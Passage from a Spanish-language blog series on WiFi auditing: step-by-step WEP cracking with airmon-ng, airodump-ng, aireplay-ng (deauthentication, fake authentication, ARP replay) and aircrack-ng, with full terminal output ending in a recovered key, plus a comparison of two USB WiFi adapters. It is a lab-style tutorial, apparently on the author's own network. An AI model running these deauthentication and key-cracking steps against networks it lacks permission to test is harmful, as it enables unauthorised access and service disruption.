Por ultimo lanzamos aircrack-ng para obtener la clave WEP.
root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 98407 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:18:85:C9  2WIRE974                  WEP (21485 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 21572 ivs.

                           Aircrack-ng 1.1 r1904


          [00:00:05] Tested 866 keys (got 20515 IVs)

KB    depth   byte(vote)
0     11/  13    C0(25600) 76(25344) 8B(25344) A6(25344) F6(24832) 12(24576) 73(24576)
1      0/   3    02(31232) 19(27904) EB(26880) 6E(26624) 8E(26624) 70(26368) 09(26112)
2      0/   4    95(31232) F2(29184) 59(26880) 14(26880) 6E(26112) 03(25856) 75(25856)
3      0/   6    92(30464) 92(28160) E5(27904) 3D(26368) C3(26112) D5(26112) 92(25344)
4      0/   1    80(34048) 06(28416) 9F(26880) 76(26624) 8A(26624) F1(26624) FB(26624)

                              KEY FOUND! [ 76:02:95:92:80 ]
Decrypted correctly: 100%
Referencias:
Hacking Exposed Wireless, Second Edition
Ataque 4: Ataque chopchop

Comparativa entre Alfa 2000mw AWUS036NH vs FL-2016G

Como tengo en mi mano estos dos dispositivos, el Alfa 2000mw AWUS036NH y FL-2016G o también conocido por el dragon, decidí ponerlos a prueba usando algunas herramientas para analizar las conexiones inalámbricas que tenemos a nuestro alcance, como el Kismet, inSSIDer y Vistumbler en Windows 7. El alfa 2000mw tiene un chipset Ralink RT2870/3070 y el FL-2016G trae el famoso chipset rtl8187. Así que verán en este post cual fue la sorpresa entre en Alfa 2000mw y el FL-2016G 1000mw.

Herramientas Utilizadas

También debo de mencionar que el dispositivo FL-2016G tiene una placa interna color verde. No es la de color azul que algunos que lo tienen mencionan que es mejor y casi similar al alfa, tal vez mas adelante compre una con placa azul para realizar un review entre estos dos dispositivos. La comparación en Windows 7 lo realice con el Vistumbler y el inSSIDer, también quise realizar la comparativa usando NetStumbler pero para esto lo realice en Windows XP ya que NetStumbler no es soportado en los demás versiones de Windows. En BackTrack utilice la herramienta Kismet.

Comparativa usando Vistumble en Windows 7

Los resultados de la tarjeta interna de mi laptop Dell Wireless 1510 Wireless-N WLAN Mini-Card.
FL-2016G 1000mw
Alfa 2000mw AWUS036NH
Esta pruebas las realice desde windows 7 utilizando la herramienta Vistumbler. Ahora veamos utilizando la herramienta inSSIDer.

Comparativa usando inSSIDer
Dell Wireless 1510 Wireless-N WLAN Mini-Card
FL-2016G 1000mw
Alfa 2000mw AWUS036NH
Usado NetStumbler
FL-2016G
Alfa 2000mw AWUS036NH

Usando Kismet en BackTrack 4 R2

Resultados del dispositivo FL-2016G 1000mw
Aquí los resultados de la Alfa 2000mw AWUS036NH

En estas ultimas imágenes podemos ver que el FL-2016G ha detectado 16 redes y el Alfa 2000mw 72 redes, sin duda es muy grande la diferencia.

Como lo he mencionado en otro lugares sin lugar a dudas me quedo con el alfa 2w. Hasta ahorita ha sido mi mejor adquisición, aunque es un dispositivo un poco caro pero bien lo vale cada peso invertido en el. Es el único dispositivo con el cual he realizado varias comparativas en diferentes Routers y a la primera todas asocia sin duda alguna, siempre se asocia correctamente a la primera y la inyección de paquetes es igual impresionante. Así que si quieres en verdad un buen dispositivo sin duda recomiendo el Alfa 2000mw, es un dispositivo muy bueno realizando auditorias y no solo eso, también es muy bueno para entornos con mucho ruido, donde existen muchas redes este dispositivo conecta y navegas tranquilamente, en cambio los demás dispositivos que tengo en algunas ocasiones fallan, algunos solo muestran que tienen suficientes señal como si tuvieras el AP a un lado de ti, pero a la hora de conectar nomas no conectan o la conexión no siempre es estable.

Si vives en un lugar donde existen muchas señales seguro que este es el dispositivo recomendado, ahora si es un lugar donde no existen muchas redes puedes adquirir un dispositivo mas barato como es el Wifisky, Kasens etc. y seguro que sirve.

Bueno en otro post veremos algún tipo de comparativa en cuanto a distancia realizando pings al router para mostrar que dispositivo mantiene la conexión siempre estable. Hasta la próxima.
En este vide se muestra el ataque 0 - Deautenticación para desasociar un cliente conectado al punto de acceso y asi obtener la clave WEP (Wired Equivalent Privacy) de la red inalambrica. El objetivo principal de los paquetes de deautenticación es interrumpir-romper la asociacion entre el cliente conectadioy el AP (Access Point). El ataque 0 o de Deautenticación (--deauth) es también conocido como el ataque DoS (Denegacion de Servicio), pero no es el propósito del vídeo.

Ataque 0: Deautenticación
Ataque 3: Reinyección de una petición ARP (ARP-request)
Estos pasos también se puede revisar en el post anterior.

Herramientas
* Backtrack 4 R2
http://www.backtrack-linux.org/downloads/
* Aircrack-ng (incluida en BackTrack)
http://www.aircrack-ng.org/
* Tarjeta WiFi que soporte el modo Monitor y la Inyección de paquetes

Comandos
root@bt:~# airmon-ng start wlan0

root@bt:~# airodump-ng mon0

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0

root@bt:~# aircrack-ng captura-01.cap
Vídeo Online
http://youtu.be/jUeBo2qBNJg?hd=1

Ataque 0: Deauthentication + Ataque 3: ARP Packets Injection = Cracking WEP

En este post veremos como se obtiene la clave WEP de una red inalambrica con un cliente conectado. Para este escenario realizamos dos ataques. El primero sera el ataque 0 o bien la deautenticación que consiste en deautenticar al cliente conectado al Punto de Acceso. El segundo lanzaremos el Ataque 3: Reinyección de una petición ARP (ARP-request) para generar nuevos IVs (vectores de inicialización).

Lo primero es poner la tarjeta en modo monitor.

root@bt:~# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
6179    dhclient

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
(monitor mode enabled on mon0)

root@bt:~#
Una vez puesto la tarjeta en modo monitor con airmon-ng. Ahora toca lanzar la herramienta airodump-ng buscar las redes wifi disponibles. Para esto tecleamos el siguiente comando en consola.

root@bt:~# airodump-ng mon0
CH  8 ][ Elapsed: 0 s ][ 2011-03-18 02:21

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:18:3F:18:85:C9    5        1        2    0   6  54 . WEP  WEP         WifiAttack

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:18:3F:18:85:C9  0C:60:76:71:D5:5B    1   54 -54      0        2

root@bt:~#
Como podemos ver tenemos una red disponible y también hay un cliente conectado a dicha red. Ahora lanzamos airodump-ng para que escuche todo el trafico de la red con el nombre de "WifiAttack".

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

Ataque 0: Deautenticación

Ahora toca lanzar el ataque 0 para deautenticar al cliente conectado a la red "WifiAttack". El cliente tiene la direccion MAC 0C:60:76:71:D5:5B. Para esto lanzamos el siguiente comando.

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0
02:27:39  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
02:27:39  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [34|63 ACKs]
02:27:40  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [17|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:42  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [13|63 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [22|65 ACKs]
02:27:44  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [18|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [16|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [14|64 ACKs]
root@bt:~#
El numero 10 es el número de deautenticaciones a enviar. Una vez desasociado el cliente lanzamos el ataque 3 para generar nuevos IVs (vectores de inicialización).

Ataque 3: ARP-Request

Lanzamos el ataque 3 (ARP-request reinjection) de aireplay-ng para aumentar la velocidad de captura de los IVs (vectores de inicialización).

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0
The interface MAC (00:C0:CA:4A:82:97) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 0C:60:76:71:D5:5B
02:28:07  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
Saving ARP requests in replay_arp-0318-022807.cap
You should also start airodump-ng to capture replies.
Read 81421 packets (got 27178 ARP requests and 26333 ACKs), sent 29719 packets...(49
root@bt:~#
Lo que sucede en este paso es, que areplay-ng escucha hasta encontrar un paquete ARP y cuando encuentra este paquete lo que hace es retransmitirlo hacia el punto de acceso, esto provoca que el AP tenga que repetir el paquete ARP con un IV nuevo y al retransmitir y retransmitir los paquetes ARP tendremos mas IVs que nos permitirán averiguar la clave WEP.

Cuando ya tengamos suficientes paquetes de datos (#Data) lanzamos aircrack-ng para crackear la Clave WEP. Abrimos consola y ejecutar aircrack-ng con el nombre del archivo guardado, en este caso es captura-01.cap

root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 86840 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:18:85:C9  WifiAttack                WEP (19315 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 19477 ivs.

                                  Aircrack-ng 1.1 r1738

                     [00:00:00] Tested 4 keys (got 19189 IVs)

 KB    depth   byte(vote)
 0    0/  1    76(26624) 1E(26112) 4D(25088) E6(24576) A5(24064) 25(23808) 36(23808
 1    0/  2    53(26368) 78(26112) 92(24832) BD(24320) 1A(23808) 0B(23552) 59(23552
 2    0/  2    95(25856) C1(25856) 3E(25088) BB(24064) DD(24064) BF(23296) ED(23296
 3    0/  1    92(27392) 40(25088) 08(24576) 45(23808) 8F(23808) 20(23296) 97(23296
 4    0/  1    80(27392) F2(26112) 46(24832) 4D(24576) 71(24576) 0E(24320) 85(24064

                       KEY FOUND! [ 76:02:95:92:80 ]
       Decrypted correctly: 100%
Este vídeo muestra como auditar con el alfa 2W AWUS036NH en Wifiway 2.0.1. Al igual que en BackTrack 4 R2, la reconoce automáticamente sin instalar ninguna parche o driver adicional. Los pasos descritos en el vídeo los realice desde VMware, donde tengo instalado Wifiway 2.0.1. Para ver como es el proceso de instalación de Wifiway 2.0.1 en VMware lo pueden ver en este post.

En el vídeo se muestran los siguientes ataques a WEP (Wired Equivalent Privacy).
Ataque 1: Autenticación Falsa
Ataque 3: Reinyección de una petición ARP (ARP-request)
Puedes verlo con mas detalle en el post anterior.

Wifiway 2.0.1
http://delfirosales.blogspot.com/2011/02/mirrors-de-wifiway-10-final-y-wifiway.html

Comandos
wifiway ~ # iwconfig

wifiway ~ # ifconfig

wifiway ~ # airmon-ng start wlan0

wifiway ~ # airodump-ng --bssid 00:18:3F:18:85:C9 -c 6 -w captura mon0

wifiway ~ # aireplay-ng -e 2WIRE6743 -a 00:18:3F:18:85:C9 -h 00:c0:ca:4a:82:97 -1 0 mon0

wifiway ~ # aireplay-ng -e 2WIRE6743 -b 00:18:3F:18:85:C9 -h 00:c0:ca:4a:82:97 -3 mon0

wifiway ~ # aircrack-ng captura-01.cap
Vídeo Online
http://www.youtube.com/watch?v=hejKstjzCNA

Inyección de Trafico Wireless con el Alfa AWUS036NH 2000MW en Wifiway 2.0.1
http://delfirosales.blogspot.com/2011/03/alfa-2w-awus036nh-en-wifiway-201-paso.html

Alfa 2W (AWUS036NH) en Wifiway 2.0.1 (Paso a Paso)

El alfa 2W (AWUS036NH) es soportado en la nueva versión de Wifiway 2.0.1, al conectarla automáticamente la reconoce, y soporta modo monitor. En este post se muestra paso a paso el proceso de como realizar una auditoria wifi con el Alfa AWUS036NH 2000MW.

Estos pasos los realice desde VMware, donde tengo instalado Wifiway 2.0.1. Para ver como es el proceso de instalación de Wifiway 2.0.1 en VMware, lo pueden ver en este post.
Lo primero que aremos es poner un iwconfig en consola, para ver si Wifiway reconoce nuestra alfa 2W, tal como se muestra a continuación.
wifiway ~ # iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any
         Mode:Managed  Access Point: Not-Associated   Tx-Power=7 dBm
         Retry  long limit:7   RTS thr:off   Fragment thr:off
         Encryption key:off
         Power Management:on
Como podemos, Wifiway lo reconoce automáticamente. Así que nuestro segundo paso es ponerlo en modo Monitor. El modo monitor es un modo especial que se usa para capturar paquetes wireles 802.11. Para esto iniciamos el script airmon-ng tal como se muestra a continuación.
wifiway ~ # airmon-ng start wlan0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
3375    dhcpcd
Process with PID 3304 (dhcpcd) is running on interface wlan0

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
                       (monitor mode enabled on mon0)
wifiway ~ #
Una vez que hemos puesto el alfa en modo monitor, podremos lanzar airodump-ng para escanear las redes que están a nuestro alcance para poder elegir un objetivo y centrarnos en una red en concreto.
wifiway ~ # airodump-ng mon0

CH 12 ][ Elapsed: 4 s ][ 2011-02-27 03:32

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

5C:4C:A9:XX:XX:XX  -80        0        0    0  11  54e  WEP  WEP         AGUXX
00:18:3F:XX:XX:XX  -24        4       55   27   6  54 . WEP  WEP         2WIREXXX

BSSID              STATION            PWR   Rate    Lost  Packets  Probes
Una vez elegido el objetivo, lanzamos el siguiente comando para decirle a airodump-ng que escuche con nuestro dispositivo USB (mon0) en el canal (6) donde esta trasmitiendo el punto de acceso (00:18:3F:XX:XX:XX).
wifiway ~ # airodump-ng --bssid 00:18:3F:XX:XX:XX -c 6 -w captura mon0
Con el parámetro --bssid indicamos la dirección MAC del punto de acceso, -c indicamos el numero de canal y el parámetro -w ponemos el nombre del archivo donde se guardaran los datos. Hecho lo anterior podremos ver las redes que están en nuestro alcance, tal como se muestra a continuación.
CH  6 ][ Elapsed: 1 min ][ 2011-02-27 03:35

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:18:3F:XX:XX:XX  -24  94      741     2922  368   6  54 . WEP  WEP    OPN  2WIRE6743

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:18:3F:XX:XX:XX  00:C0:CA:XX:XX:XX    0    0 - 1     58     6394
00:18:3F:XX:XX:XX  0C:60:76:XX:XX:XX  -14   54 -54      0       5
Ahora lo que haremos es realizar una falsa autenticación con el Punto de Acceso Wifi para que acepte cualquier paquete que le enviemos. Para esto, en consola realizamos lo siguiente.
wifiway ~ # aireplay-ng -e 2WIREXXX -a 00:18:3F:XX:XX:XX -h 00:c0:XX:XX:XX:XX -1 0 mon0
03:34:44  Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6

03:34:44  Sending Authentication Request (Open System) [ACK]
03:34:44  Authentication successful
03:34:44  Sending Association Request [ACK]
03:34:44  Association successful :-) (AID: 1)
Tal como podemos ver, nos hemos asociado correctamente. Ahora, como nuestra alfa AWUS036NH 2000MW si que soporta la inyección de paquetes, lanzamos el ataque 3 (ARP-request reinjection) de aireplay-ng para aumentar la velocidad de captura de los IVs (vectores de inicialización).

Lo que sucede en este paso es, que areplay-ng escucha hasta encontrar un paquete ARP y cuando encuentra este paquete lo que hace es retransmitirlo hacia el punto de acceso, esto provoca que el AP tenga que repetir el paquete ARP con un IV nuevo y al retransmitir y retransmitir los paquetes ARP tendremos mas IVs que nos permitirán averiguar la clave WEP.
wifiway ~ # aireplay-ng -e 2WIREXXX -b 00:18:3F:XX:XX:XX -h 00:c0:ca:XX:XX:XX -3 mon0
03:34:54  Waiting for beacon frame (BSSID: 00:18:XX:XX:XX:XX) on channel 6
Saving ARP requests in replay_arp-0227-033454.cap
You should also start airodump-ng to capture replies.
Read 6930 packets (got 1968 ARP requests and 1963 ACKs), sent 1989 packets...(499 pps)
Ahora solo toca esperar a que tengamos suficientes paquetes de datos (#Data) para ejecutar aircrack-ng para crackear la Clave WEP.

Una vez que ya tengamos suficientes "datas" ejecutamos aircrack-ng para crackear la clave WEP. Abrimos consola y ejecutar aircrack-ng con el nombre del archivo guardado, en este caso es captura-01.cap
wifiway ~ # aircrack-ng captura-01.cap
Opening captura-01.cap
Read 114810 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:XX:XX:XX  2WIREXXX                 WEP (25944 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 26149 ivs.

                            Aircrack-ng 1.1 r1734


            [00:00:00] Tested 8 keys (got 25979 IVs)

KB    depth   byte(vote)
0    2/  4   5E(32768) 76(31488) D1(31488) 1C(31232) ED(31232) 58(30976)
1    0/  1   02(35072) 7A(33024) E0(32768) 5B(32512) 8E(32256) 92(31488)
2    0/  1   95(36864) BC(33280) 0E(32256) DB(32000) 54(31488) 5F(31488)
3    0/  1   92(38656) 1E(34816) 8C(33280) C5(32512) 44(32256) DE(32256)
4    0/  2   80(35328) 3E(34048) 84(32512) 54(32256) EB(32256) 8F(30976)

                KEY FOUND! [ 76:02:95:92:80 ]
Decrypted correctly: 100%
Happy hacking wireless con el alfa AWUS036NH 2000MW...